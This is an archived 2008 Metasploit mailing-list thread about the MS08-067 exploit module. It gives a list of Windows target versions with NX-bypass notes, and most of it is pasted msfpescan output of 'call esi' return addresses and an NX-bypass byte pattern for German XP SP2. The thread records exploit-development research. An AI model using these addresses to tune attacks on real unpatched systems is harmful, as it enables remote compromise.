MS08-067 added to SVN trunk (3.2-testing)

[ramon at risesecurity.org (Ramon de Carvalho Valle)]

Hi,

Just added Portuguese (Brazil) (NX) SP2/SP3 targets.

Best regards,


On Fri, 2008-10-31 at 12:41 +0100, think.pink at gmx.de wrote:
> Hello,
>
> here's the output for WinXP  (SP2 german).
> Unfortunately none of the addresses work for me  :-(
> Maybe somebody can check it.
>
>
> bt temp # /msf3/msfpescan -j esi acgenral.dll
> [acgenral.dll]
> 0x6fd9f727 call esi
> 0x6fda1418 call esi
> 0x6fda145f call esi
> 0x6fda17cb call esi
> 0x6fda17d6 call esi
> 0x6fda2a52 call esi
> 0x6fda2a57 call esi
> 0x6fda2a85 call esi
> 0x6fda2a90 call esi
> 0x6fda2ab4 call esi
> 0x6fda2aba call esi
> 0x6fda2b0a call esi
> 0x6fda2b0f call esi
> 0x6fda33b6 call esi
> 0x6fda3426 call esi
> 0x6fda524e call esi
> 0x6fda5255 call esi
> 0x6fda52ce call esi
> 0x6fda52d5 call esi
> 0x6fda597a call esi
> 0x6fda59a8 call esi
> 0x6fda59f7 call esi
> 0x6fda59fc call esi
> 0x6fda687b call esi
> 0x6fda687e call esi
> 0x6fda6881 call esi
> 0x6fda6922 call esi
> 0x6fda695e call esi
> 0x6fda696e call esi
> 0x6fda7ecb call esi
> 0x6fda7ed5 call esi
> 0x6fda844a call esi
> 0x6fdaaf60 call esi
> 0x6fdad7db call esi
> 0x6fdad7e3 call esi
> 0x6fdad9be call esi
> 0x6fdad9d6 call esi
> 0x6fdad9e9 call esi
> 0x6fdada01 call esi
> 0x6fdada14 call esi
> 0x6fdada2c call esi
> 0x6fdada43 call esi
> 0x6fdada59 call esi
> 0x6fdada82 call esi
> 0x6fdadb62 call esi
> 0x6fdadb80 call esi
> 0x6fdadb93 call esi
> 0x6fdadbab call esi
> 0x6fdadbc0 call esi
> 0x6fdadd58 call esi
> 0x6fdaddc5 call esi
> 0x6fdadf6b call esi
> 0x6fdadf80 call esi
> 0x6fdae00b call esi
> 0x6fdae01b call esi
> 0x6fdb1136 call esi
> 0x6fdb1153 call esi
> 0x6fdb11e1 call esi
> 0x6fdb11ff call esi
> 0x6fdb3605 call esi
> 0x6fdb3618 call esi
> 0x6fdb364f call esi
> 0x6fdb3662 call esi
> 0x6fdb3699 call esi
> 0x6fdb36ac call esi
> 0x6fdb4d2b call esi
> 0x6fdb4d54 call esi
> 0x6fdb4d7d call esi
> 0x6fdb4da6 call esi
> 0x6fdb4dcf call esi
> 0x6fdb4df8 call esi
> 0x6fdb4e21 call esi
> 0x6fdb4e4a call esi
> 0x6fdb4e73 call esi
> 0x6fdb86e8 call esi
> 0x6fdb871f call esi
> 0x6fdb8752 call esi
> 0x6fdb8775 call esi
> 0x6fdbb829 push esi; ret
> 0x6fdbb872 push esi; ret
> 0x6fdbb8ab push esi; ret
> 0x6fdbc78a call esi
> 0x6fdbc7e5 call esi
> 0x6fdbce32 call esi
> 0x6fdbce43 call esi
> 0x6fdbce50 call esi
> 0x6fdbce66 call esi
> 0x6fdbce77 call esi
> 0x6fdbdec1 call esi
> 0x6fdbded4 call esi
> 0x6fdc0fdf call esi
>
> bt temp # /msf3/msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
> [acgenral.dll]
> 0x6fda16e2 6a048d4508506a226aff
>
>
>
>
>
>
> -------- Original-Nachricht --------
> > Datum: Fri, 31 Oct 2008 00:16:03 -0500
> > Von: H D Moore <hdm at metasploit.com>
> > An: framework at spool.metasploit.com
> > Betreff: Re: [framework] MS08-067 added to SVN trunk (3.2-testing)
>
> > New targets:
> >
> >    0   Windows 2000 MS06-040+ (YMMV pre MS06-040)
> >    1   Windows XP SP2 English (NX)
> >    2   Windows XP SP2 Italian (NX)
> >    3   Windows XP SP2 Spanish (NX)
> >    4   Windows XP SP2 Chinese (NX)
> >    5   Windows XP SP3 English (NX)
> >    6   Windows XP SP3 German (NX)
> >    7   Windows 2003 SP0 English (NO NX)
> >    8   Windows 2003 SP2 English (NO NX)
> >    9   Windows 2003 SP2 English (NX)
> >
> > This list incorporates all of the new targets sent in by list members as 
> > well as Brett Moore's NX bypass method for Windows 2003 SP2 and Antoine's 
> > Windows 2000 near-universal. Thanks again and please send in the ret/nx 
> > addresses for any of the missing targets (SP3 chinese,spanish,italian), 
> > (SP2 german).
> >
> > -HD
> > _______________________________________________
> > http://spool.metasploit.com/mailman/listinfo/framework
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081031/260a0dfd/attachment.pgp>